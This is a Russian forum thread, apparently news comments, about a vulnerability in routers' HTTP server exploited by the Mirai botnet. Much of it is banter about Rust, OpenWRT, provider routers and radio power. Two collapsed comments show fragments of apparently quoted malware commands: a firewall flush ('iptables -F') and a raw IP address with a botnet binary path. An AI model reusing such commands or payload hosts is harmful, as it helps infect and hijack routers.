    Пересказ твоего спора с голосами в твоей голове мне не очень интересен Повторю... текст свёрнут, показать
     
  • 4.222, Аноним (222), 02:14, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А чего разве большой обьем на выходе? Вроде транслирует все тот же LLVM.
     
  • 2.71, anonymous (??), 14:04, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +6 +/
    И даже тут надо обязательно какашку в Rust кинуть. Как же без этого? Такое ощущение, что комментаторы любую новость сводят в обсирание Rust.
     
     
  • 3.79, Аноним (291), 14:21, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Есть сильное подозрение, что уязвимый код, про который речь в этой новости, был написан не на Rust.

    А это уже вина Rust - почему какой-то код на нем не написан?

     
     
  • 4.96, Аноним (52), 15:00, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    То есть ржавый не подходит для написания кода ржавого, но это не вина ржавого? Вам бы премию дали за особенности в развитии.
     
     
  • 5.126, Аноним (291), 17:16, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Не совсем. Ржавый не подходит для замены кода на Си, потому что на нём плохо реализованы ошибки работы с памятью.
     
     
  • 6.129, Аноним (291), 17:18, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Одни в принципе не воспроизводятся, другие требуют явного указания unsafe, что нарушает главное свойство хорошей ошибки (она должна быть незаметной).
     
  • 3.89, Брат Анон (ok), 14:57, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Чо ты так переживаешь. Я гошник/питонер, и я минус не ставил. Так как немного есть разница между либой и языком. В либах всякое бывает, да. Язык тут не причём. Хотя я ржавого на дух не переношу.
     
     
  • 4.255, Аноним (-), 14:13, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Если у языка либа не вынесена в отдельную независимую сущность, тогда CVE неизбежно улетает языку. А какие еще варианты? Сказать что ложки^W CVE нет? :))
     
     
  • 5.259, Рукалицо (?), 14:49, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Если у языка либа не вынесена в отдельную независимую сущность, тогда

    Ести аноним несет отдельный, независимый бред, тогда ...

     
  • 5.286, Аноним (291), 10:11, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Если у языка либа не вынесена в отдельную независимую сущность

    То этот язык угоден Оккаму.

     
     
  • 6.313, Аноним (-), 15:54, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > То этот язык угоден Оккаму.

    Скорее, его бритве. Но это все же не отвечает на вопрос куда в этом случае деть CVE кроме самого ЯП.

     
  • 3.151, Аноним (151), 18:13, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Обязательно нужно сбалансировать неуёмный растопиар, иначе у неокрепших умов может сложиться впечатление, что раст безопасный язык.
     
     
  • 4.164, Аноним (-), 19:17, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Обязательно нужно сбалансировать неуёмный растопиар, иначе у неокрепших умов может сложиться
    > впечатление, что раст безопасный язык.

    Безопасность безопасностью, а 256 CVE уже влепили. Хотя нет, уже как минимум 257, с учетом свежей новости про либу и айпишники.

     
     
  • 5.177, Аноним (291), 20:36, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Богато. А у сишных подeлий счёт уже за миллион перевалил, наверное. Или миллиард?
     
     
  • 6.185, Аноним (-), 21:00, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ну, если учесть что софта на хрусте никто толком не видел в диком виде...
     

     ....большая нить свёрнута, показать (41)

  • 1.7, InuYasha (??), 11:19, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    >>многие операторы оставляют на своих устройствах доступ из внешней сети для упрощения диагностики проблем службой поддержки.

    Так точно. Видел многократно. Вернее, у домашних Быдлайнов (лажа) и Ростелегомов (дно), МГТСов (днище) такое повсеместно (особенно GovnoPON). Самое пика-пика-нтное, что, даже если поменяешь пароли на админку, для прова есть секретная админка. Но, даже если поменяешь пароль и на неё (а это не всегда возможно), то - сюрприз-сюрприз! - ротор сбросят и перепрошьют всё равно. :3

     
     
  • 2.11, OnTheEdge (ok), 11:35, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +11 +/
    > у домашних Быдлайнов

    гиги за дыры

    > Ростелегомов

    больше возможностей для эксплуатации дыр


    > МГТСов

    не дыра, а ДЫРИЩЕ!

     
     
  • 3.103, Аноним (103), 15:33, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Это фича, карманный ботнет.
     
     
  • 4.238, Аноним (-), 11:33, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Это фича, карманный ботнет.

    Мегафно: тебя выпер с роутера вирус. Потому что ты крутой!

     
     
  • 5.292, Аноним (291), 10:31, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Это вирус-саппортер, он помогает оператору заботиться о пользователях!
     
  • 2.149, pofigist (?), 18:11, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >  Но, даже если поменяешь пароль и на неё (а это не всегда возможно), то - сюрприз-сюрприз! - ротор сбросят и перепрошьют всё равно. :3

    Если ты ПЕРЕД сменой пароля не озаботился отключением TR-069, то это ТВОИ проблемы, а не роутера или провайдера...

     
  • 2.223, kissmyass (?), 02:31, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    переводите роутер в режим моста и ставьте свой роутер на вход, так делают все вменяемые ребята

    я бы ставил что-то типа микрота

     
     
  • 3.288, Аноним (291), 10:19, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > я бы ставил что-то типа микрота

    Да, если у нас в критичном месте стоит проприетарщина, самое логичное решение - поставить вторую проприетарщину.

     
     
  • 4.318, kissmyass (?), 17:47, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    >> я бы ставил что-то типа микрота
    > Да, если у нас в критичном месте стоит проприетарщина, самое логичное решение
    > - поставить вторую проприетарщину.

    ну если хочешь, то собирай прошивку сам и используй OpenWRT-совместимый комбайн

    ты можешь получить сырцы микрота, но опенсорсом это не назовешь

    по-крайней мере это киска дорогая и не убикюити который тоже дороже, так еще и открыто анальный зонд пихает

     
     
  • 5.328, Аноним (291), 14:06, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Если микротик хочет продолжать продажи на американском и европейском рынке, ему тоже придётся перенести управление устройствами пользователей в облако в американской юрисдикции. Пытаться игнорировать требования ФБР - себе дороже. Убики и atlassian уже прогнулись.
     
     
  • 6.339, kissmyass (?), 22:55, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Если микротик хочет продолжать продажи на американском и европейском рынке, ему тоже
    > придётся перенести управление устройствами пользователей в облако в американской юрисдикции.
    > Пытаться игнорировать требования ФБР - себе дороже. Убики и atlassian уже
    > прогнулись.

    а пруфы будут? )) обоcрался пока только убик, и насколько я знаю это его личная инициатива, телеметрии им бладь мало

     

  • 1.12, Аноним (12), 11:40, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –7 +/
    Неужели кто то использует эти железки без прошивки на openvrt?!
     
     
  • 2.31, Абвгдейка (?), 12:32, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +30 +/
    Никто не использует.
    В магазах обычно 2 очереди, одна за роутерами, вторая - перепрошиватся на OpenWRT.
    Если заказывать роутер через инет, то магаз за свой счет перепрошивает и присылает перепрошитый.
    Далее к этому роутеру прикрепляется специальный индиго-разрабоадмин который тщательно каждый день отслеживает новости об уязвимостях в OpenWRT и в случае обнаружения оной немедленно фиксит и накатывает апдейт.
    Кстати, забыл сказать, что в любой магазе в отделе роутеров висит большой мигающий плакат с надписью: "Уважаемые покупатели, после покупки роутера рекомендуем незамедлительно перепрошить его на OpenWRT".
     
     
  • 3.39, Аноним (-), 12:52, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Подтверждаю, а те, кому провайдер дал роутер, под который нету прошивки DD-RWT (и которые вообще невозможно своими ручками обновить), сразу выкидывают его и бегут покупать новый с DD-RWT. Пароли ставят надёжные, Telnet и UPnP отключают. Ага.
     
     
  • 4.294, Онаним (?), 11:29, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Наш человек ни за что не купит нормальный роутер, если пров дал бесплатный.
     
     
  • 5.309, Аноним (309), 14:48, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Только не надо гнать на СНГ. Люди вообще далеки от технологий, компьютеров, прошивок, уязвимостей, обновлений и прочего. Дали, работает эта коробочка, светятся лампочки, ютубчик работает и нормально. Так и думают, сидят на семёрке, пока не клюнет.
     
     
  • 6.329, Аноним (291), 14:12, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ну, люди везде плюс-минус одинаковые. Это квасные патриоты говорят "только наш человек может <что-то крутое>", а смердяковы - "только наш человек может <что-то позорное>".
    Иллюзия быстро исчезает, если помотаться по миру и пообщаться с людьми.
     
  • 3.40, LeNiN (ok), 12:52, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Подскажите координаты вашей параллельной вселенной, хочу жить там :)
     
     
  • 4.42, Аноним (-), 12:57, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Аноним (12) уже там живёт, а мы пока только фантазируем.
     
     
  • 5.44, Аноним (-), 13:00, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    И ещё не забудьте про WPA-TKIP, и если особо повезёт, WEP
     
     
  • 6.188, Аноним (-), 21:08, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > И ещё не забудьте про WPA-TKIP, и если особо повезёт, WEP

    А разве WPA-TKIP полностью сломали? Там вроде только относительно бесполезные атаки есть?

     
     
  • 7.261, Аноним (-), 17:52, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Вообще-то нет, есть и значимые атаки. NOMORE - атака на шифр RC4 в основе WPA-TKIP, WEP и нашумевший KRACK. Вторую поправили программно на большинстве устройств, а первая неустранима, позволяет расшифровывать и подделывать данные, передаваемые WiFi.
     
     
  • 8.319, vitektm (?), 17:47, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    ну фиг знает я wep не видел вживую лет 6-8 если не больше Больше шанс найти без... текст свёрнут, показать
     
  • 4.94, Брат Анон (ok), 15:00, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Гравицапу подаришь -- скажу.

    Я пока надень цак, дорогой.

     
  • 3.93, Брат Анон (ok), 14:58, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А меня даже оштрафовали за отказ приви.... перепрошивать роутер.
     
     
  • 4.102, Аноним (-), 15:22, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > за отказ приви....

    За этим вам не сюда.

     
  • 2.121, Kuromi (ok), 17:06, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Это ADSL оборудование, акие железки далеко не всегда можно перепрошить без потери основной функциональности.
     
     
  • 3.152, pofigist (?), 18:14, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > далеко не всегда можно перепрошить без потери основной функциональности.

    Вообще-то их обычно нельзя перепрошить. Вообще.

     
     
  • 4.189, Аноним (-), 21:08, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Почему же, из Калашникова - можно.

     
  • 4.322, Kuromi (ok), 21:11, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    >> далеко не всегда можно перепрошить без потери основной функциональности.
    > Вообще-то их обычно нельзя перепрошить. Вообще.

    Ну например ситуация с устройсвами с встроенным SIP адаптером - роутерная часть шьется, телефония теряется.

     

  • 1.13, Аноним (13), 11:42, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Опять никакого уважения к пользователям зюзерутеров, могля бы и для КДЕ эксплоитов занести.
     
  • 1.15, господин полковник АНБ (?), 11:50, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Такие уязвимости намекают о необходимости перепрошивать роутеры в OpenWRT.
     
     
  • 2.153, pofigist (?), 18:17, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ничего что это можно сделать для заветного 1% всех моделей мыльниц на рынке?

    И при этом adsl, gpon, docsis и т.д. в этот 1% - гарантировано не попадают? А это - 80+% всех абонентских терминалов...

     
     
  • 3.157, Аноним (-), 18:43, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Тогда эта штука подарит тебе приятные бонусы Например, такие iptables -F iptab... большой текст свёрнут, показать
     
  • 3.234, господин полковник АНБ (?), 10:49, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Роутеры без возможности перепрошивки в OpenWRT покупать безответственно.
    Нельзя полагаться на прошивку (блоб) производителя.
    А оборудование ADSL или GPON нужно настраивать в бридж (bridge), за которым ставить "правильный" роутер.  
    Иначе, полагаться на производителя, когда тот смилостивиться обновить прошивку с исправлением текущих уязвимостей.
     
     
  • 4.267, pofigist (?), 20:17, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Для начала - заветные 80+% мыльниц не покупаются пользователем, они выдаются ему его провайдером.

    Далее - далеко не любую мыльницу можно загнать в режим бриджа. Это кстати одна из причин почему у меня не GPON. С ADSL кстати все гораздо проще - поставил модуль в маршрутизатор и всё работает. А вот с GPON - так уже не прокатит. С DOCSIS вроде тоже, но не уверен - меня бог миловал иметь дело с этим чудом...

    Ну я уж и не говорю что LuCi - не для обычного юзверя...

     
     
  • 5.300, Аноним (-), 13:25, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Для начала - заветные 80+% мыльниц не покупаются пользователем, они выдаются ему его провайдером.

    А еще говорят что 95% людей - идиоты. Вирус чем-то таким и пользуется, пролезая между первым и вторым. Технически там нет ничего необычного. Обычное использование дураков и пофигистов в хвост и в гриву.

     
     
  • 6.323, pofigist (?), 22:35, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Вопрос даже не в лени, а в том что на тот же GPON ты просто не поставишь свой роутер. Ну вот в принципе - только провайдерский.
    А его соответственно - далеко не всегда можно загнать в режим бриджа...
    А если тебе повезло и тебе дали старую модель, где это можно - тебе просто никто не даст его пароль - придется сбрасывать и подбирать настройки. А это - бывает не просто. Особенно если мыльница - брендирована провайдером, а она обычно брендирована...
    Ну и вишенка на торте - это нарушение договора, со всеми вытекающими.
     

  • 1.16, ryoken (ok), 11:51, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    >> ботнету Mirai

    Mirai это вроде по-японски "будущее" ?

     
     
  • 2.18, Аноним (52), 11:55, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ага, 未来 будущее/грядущее.
     
  • 2.158, Аноним (-), 18:45, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ну да И к тому были причины Примерно такие http 212 192 241 72 bins dark x8... большой текст свёрнут, показать
     
     
  • 3.257, Аноним (-), 14:29, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Кстати landley и aboriginal - это https://github.com/landley/aboriginal

    Некая достаточно кастомная билдсистема. Автор что-то делал для марсианского вертолетика и врядли сам имеет отношение к раздаче вирусов.

     
     
  • 4.273, пох. (?), 21:52, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Кстати landley и aboriginal - это https://github.com/landley/aboriginal
    > Некая достаточно кастомная билдсистема.

    кросстулза для сборки не под свой процессор.

    The build supports most architectures QEMU can emulate (x86, arm, powerpc, mips, sh4, sparc...)
    отсюда и странный набор - я его слепила что готовым было.

    Эх, сломали горшочек, сдох тот сервак. Не успел я себе скачать полезных и нужных бинарников.

     
     
  • 5.302, Аноним (-), 13:40, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Я так понял что затеяно это было как мини линух способный собирать себя, с изуче... большой текст свёрнут, показать
     
     
  • 6.306, пох. (?), 14:17, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Я так понял что затеяно это было как мини линух способный собирать себя,

    ну как видишь, не только себя.

    > Ну я так и понял что хацкеры его поюзали за то что это минимальный линух в котором можно
    > собрать вон те щтуки.

    ну да, причем не надо ничего особо уметь, все в хомяк, все в хомяк.
    Оно банально в куеме потом запускается, с шеллом.

    > Ага, сдох. А чего в них полезного?

    ну вот и посмотреть, чего. Мне интересней были образы для армов и мипса - раз ботнет живой, они-то точно были работающие.

     
     
  • 7.314, Аноним (-), 16:26, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ну да, еще, вот, небольшую примочку, чего б ему не, с компилером который линух в... большой текст свёрнут, показать
     
     
  • 8.315, пох. (?), 17:18, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    ну выложи куда-нибудь в яндексдиск как обычно - рар с паролем,а то знаем мы эту... текст свёрнут, показать
     
  • 3.279, Michael Shigorin (ok), 01:03, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    >> Mirai это вроде по-японски "будущее" ?
    > Ну да. И к тому были причины. Примерно такие:

    *yaawn*

     

  • 1.17, Аноним (52), 11:52, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +7 +/
    OpenWRT без Luci попробуйте оприходовать. Самое смешное что как-то пытались протолкнуть идею о запрете перепрошивки роутера. Теперь понятно зачем. В сэшэакии так уже запретили. Мы как всегда отстали от самых демократичных к роутерам демократам.
     
     
  • 2.19, Аноним (13), 11:56, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Там запретили программно менять параметры радиотакта (т.е. модифицировать устройство для вещания на не разрешённых частотах), а не прямо вот так, чтобы полностью прошивку заменять.
     
     
  • 3.23, Аноним (62), 12:07, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Самое забавное что у нас вещать не неразрешенных частотах тоже запрещено, но до роутеров в явном виде еще не добравлись.
     
     
  • 4.45, Аноним (52), 13:04, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Интересно ноутбук будет считаться роутером? А если там есть esim? А если по USB поключен хаб и интернет идет через него? А клавиатурная версия Рпи4 тоже роутер потому что у него есть лан порт? Смартфон это роутер когда тетерит?
     
     
  • 5.69, Аноним (62), 14:01, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    На изучай https://certificate.moscow/%D0%93%D0%BB%D0%B0� коротка да, но есть нюансы.
     
  • 5.83, Аноним (291), 14:32, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Интересно ноутбук будет считаться роутером? А если там есть esim? А если по USB поключен хаб и интернет идет через него? А клавиатурная версия Рпи4 тоже роутер потому что у него есть лан порт? Смартфон это роутер когда тетерит?

    Ни ноут, ни смартфон точно не выдадут такую ЭИИМ, чтобы нарушить нормативы РКН.
    У них скорее чипы сгорят от слишком высокого КСВН в антенном тракте.

     
     
  • 6.98, Аноним (52), 15:06, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Ну вообще-то в смартфонах есть контакт для подключения антенны как на роутере. И собственно никто не мешает воткнуть большую такую антенну в смарфтон и на малой мощности получить предельно разрешенную мощность сигнала. То что в смарфтоне может исполнять роль антенны проволочка, то это еще не значит, что плата больше никак не может быть использована. Но мощность сигнала почему-то меряется в миллиамперах. А то что вместо антенн на 6 децибелл человек может поставить 18 дб это в голову не приходит?
     
     
  • 7.110, Аноним (291), 15:58, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    О да, волшебная антенна спасет отца русской демократии.
    В том числе и от ограничений РКН, потому что для узконаправленной передачи нормативы совсем другие.

    Или вы думаете, что в "хорошую" антенну можно закачать 1 dBm, а на выходе получить 1 dBW сразу во все стороны?

    > Но мощность сигнала почему-то меряется в миллиамперах.
    > Мощность
    > миллиамперах

    А, ну да, понятно.

     
     
  • 8.116, Аноним (52), 16:56, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ну погляди в настройках роутера Там есть от 10 до 100 миллиампер настройка То ... текст свёрнут, показать
     
     
  • 9.124, Аноним (291), 17:11, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Измеряете мощность в миллиамперах, но советуете другим учить учить физику Typic... текст свёрнут, показать
     
     
  • 10.160, Аноним (-), 18:54, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Фига ламо, -dBm миллиамперами назвать А что там роутер решит - отдельный вопрос... текст свёрнут, показать
     
  • 10.209, Аноним (52), 22:22, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Кто про мощность сигнала, а кто про затраты при передаче на расстоянии У вас мо... текст свёрнут, показать
     
  • 9.181, Аноним (181), 20:50, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Аха-ха-ха D Бриллиант, в анналы Такого фееричного бреда я ещё не видел И э... текст свёрнут, показать
     
     
  • 10.186, Атон (?), 21:06, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Внезапно да beamforming в роутере для ближних клиентов снижает мощность переда... текст свёрнут, показать
     
     
  • 11.190, Аноним (181), 21:10, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Я понимаю, что ты пытаешься найти рац зерно в бреде Но ты же понимаешь, что чуд... текст свёрнут, показать
     
     
  • 12.199, Атон (?), 21:27, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    но теперь то он прочтет и поймет умнее станет считай ВУЗ за вечер закончил ... текст свёрнут, показать
     
     
  • 13.215, Аноним (181), 23:12, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Чудак надменно выдаёт учи физику , с таким отношением сомнительно ... текст свёрнут, показать
     
  • 11.192, Аноним (-), 21:13, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Beamforming по определению - формирует лучи Ну то-есть координирует нескольк... текст свёрнут, показать
     
     
  • 12.195, Атон (?), 21:21, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    это не важная часть бимформинга потому что мир зохватили экоактивисты, греты ... текст свёрнут, показать
     
     
  • 13.200, Аноним (-), 21:33, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Для тех кто в танке еще раз beam forming и power management разные фичи Продви... большой текст свёрнут, показать
     
     
  • 14.204, Атон (?), 21:39, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    молодец грокаешь ... текст свёрнут, показать
     
  • 14.280, Michael Shigorin (ok), 01:08, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Уважаемый Юзер, для тех, кому за 10 , может оказаться очевидной другая штука е... текст свёрнут, показать
     
     
  • 15.307, Аноним (-), 14:22, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    1 Если посмотреть другие сообщения, я немного догадываюсь 2 Интересная штука ... текст свёрнут, показать
     
  • 6.159, Аноним (-), 18:50, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Ни ноут, ни смартфон точно не выдадут такую ЭИИМ, чтобы нарушить нормативы РКН.

    Вообще, телефон сам по себе умеет 2 ватта (+30dBm) в эфир долбить, как минимум в режиме GSM. Что довольно неплохо для такой мелочи так то.

    И кстати да, если с антенной что-то не так, дырка в чипе иногда случается...

     
     
  • 7.191, Атон (?), 21:11, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > телефон сам по себе умеет 2 ватта (+30dBm) в эфир долбить, как минимум в режиме GSM

    Если ты найдешь телефон середины 90х, то да, он тебе в ухо 2 Вт надует.
    Но давно уже нет ТЕХ сетей GSM. БС натыканы так часто, что подвижным терминалам нет необходимости _уметь_ излучать 2Вт.

     
     
  • 8.196, Аноним (-), 21:21, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    И почти любой GSM-compatible Секрет в том что 2 ватта - в импульсе Но это 1 8 ... большой текст свёрнут, показать
     
     
  • 9.202, Атон (?), 21:37, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Да, вот только увеличение мощности ну никак не поможет долететь В GSM 2Вт эт... текст свёрнут, показать
     
     
  • 10.207, Аноним (-), 21:50, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Очень даже поможет У мобилы не ахти какая антенна и выловить дохлый сигнал, да ... большой текст свёрнут, показать
     
     
  • 11.208, Атон (?), 22:01, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Не стесняйся признаваться Ты конечно правильно говоришь, но про слоты речи вооб... текст свёрнут, показать
     
     
  • 12.241, Аноним (-), 11:48, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    RTFMнуть соответствующие ETSI clauses и даташиты на модули реализующие это - нав... большой текст свёрнут, показать
     
     
  • 13.282, Michael Shigorin (ok), 01:11, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    gsmforum, не ... текст свёрнут, показать
     
     
  • 14.308, Аноним (-), 14:46, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Не знаю Стандартизатор GSM 3G если что ETSI называется, самые полные доки т... текст свёрнут, показать
     
  • 9.281, Michael Shigorin (ok), 01:10, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    То-то на Киев лет десять назад приходилось _две_, что ли, БС-ки CDMA и уж не зна... текст свёрнут, показать
     
     
  • 10.310, Аноним (-), 14:52, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Если вы хотели поспорить, то вон то - результат натурных экспериментов в всяких ... текст свёрнут, показать
     
  • 3.55, Аноним (52), 13:14, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    В настройках OpenWRT заходишь и ставишь любой регион. Хочешь Китай будет. Вещать может будет на разрешенной частоте, но например сильнее в 2 раза. Подумаешь стены у тебя в доме толстые. Чего теперь страдать что-ли?
     
     
  • 4.75, Аноним (291), 14:14, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –4 +/
    Именно поэтому OpenWRT в цивилизованных странах вытесняется проприетарными решениями.
     
     
  • 5.106, Аноним (52), 15:47, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    А пофигу. Я вот китайский Xiaomi R3 Pro предпочту даже wifi6 ибо все равно более 200 устройств не выжрут более гигабита. А дурачки будут покупать штеудский вафлемодуль, чтобы не иметь возможности раздавать интернет с ноутбука, который пойдет по проводу через смартфон. Очень круто дэа, у меня на ath9k будет работать любая функция. Хочешь в режиме монитора - пожалуйста. Хочешь без закрытой фирмвари от штеуда? - На здоровье. 3 канала в 5 ггц то всяко хватает. OpenWRT же явлется базой на которой и строятся прошивки в Xiaomi. А потому уйти от проприетарного клона это нормально.
     
     
  • 6.111, Аноним (291), 16:03, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –6 +/
    > А пофигу. Я вот китайский Xiaomi R3 Pro предпочту

    Что вы, это же тоталитарный Китай! Оттуда ночью ночью вылезет Винни-Пух и подло обесчестит вас!

    Huawei, Xiaomi - в цивилизованных странах absolutely no-go, покупая их, вы совершаете преступление против демокраси!

     
     
  • 7.119, Аноним (52), 17:03, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Вот уж о ком я подумаю в последнюю очередь это демосраты. Был выбор среди soho роутеров, и от кинетика аналогичное железо, но с 256 мегабайтами памяти стоило в 2 раза дороже почему-то. Да и ненужна прошивка от кинетика когда в OpenWRT можно запихнуть что угодно. Неконкурентноспособны роутеры сторонних производителей против серого импорта того, что сделано для внутреннего рынка Китая и просто не имеет русского языка в прошивке. Ну разве что SFP порт воткнут в ту же цену, это я одобрил бы. Но есть простые устройства для переделки оптического сигнала в обычные сигналы RJ45 а потому SFP порт нужен в основном людям у кого дом где-нибудь в пригороде. Редко в общем полезно бывает, но и это не киллер фича.
     
  • 7.167, Аноним (-), 19:23, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Huawei, Xiaomi -

    Только потом трафик еще не забыть поснифать, куда он там такой хороший ломится. Как минимум телефоны этих фирм занимаются проституцией за двоих: сливают и гуглу и на какие-то свои узкоглазые сервера.

     
  • 5.283, Michael Shigorin (ok), 01:12, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Именно поэтому OpenWRT в цивилизованных странах

    А можно пример цивилизованной страны по Вашей версии?
    Хоть новости оттуда почитаю, порадуюсь.
    Как тот доктор из бородатого анекдота.

    > вытесняется проприетарными решениями.

     
  • 3.68, Аноним (291), 14:00, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Там запретили программно менять параметры радиотакта (т.е. модифицировать устройство для вещания на не разрешённых частотах), а не прямо вот так, чтобы полностью прошивку заменять.

    Под предлогом первого запретили именно второе.

     
  • 2.165, Аноним (-), 19:20, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > OpenWRT без Luci попробуйте оприходовать.

    Я так и делал. Сохранил как-то конфиг радио и проч а потом вкатывал его. Чтоб вебфейс не ставить. Так то потом по мелочи через uci можно подрихтовать параметры.

     

     ....большая нить свёрнута, показать (42)

  • 1.20, Админ Анонимов (?), 11:58, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    а http-сервера от компании Arcadyan случайно не на С или С++ написан ?
     
     
  • 2.21, Плюсовик (?), 12:03, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ты тип ошибки видел? Подобное можно написать на всех существующих и будущих языках программирования.
     
     
  • 3.28, Админ Анонимов (?), 12:17, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    так ты хочешь сказать что это были рукожопые сишники ?
     
     
  • 4.50, Плюсовик (?), 13:08, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ты видел ошибку?

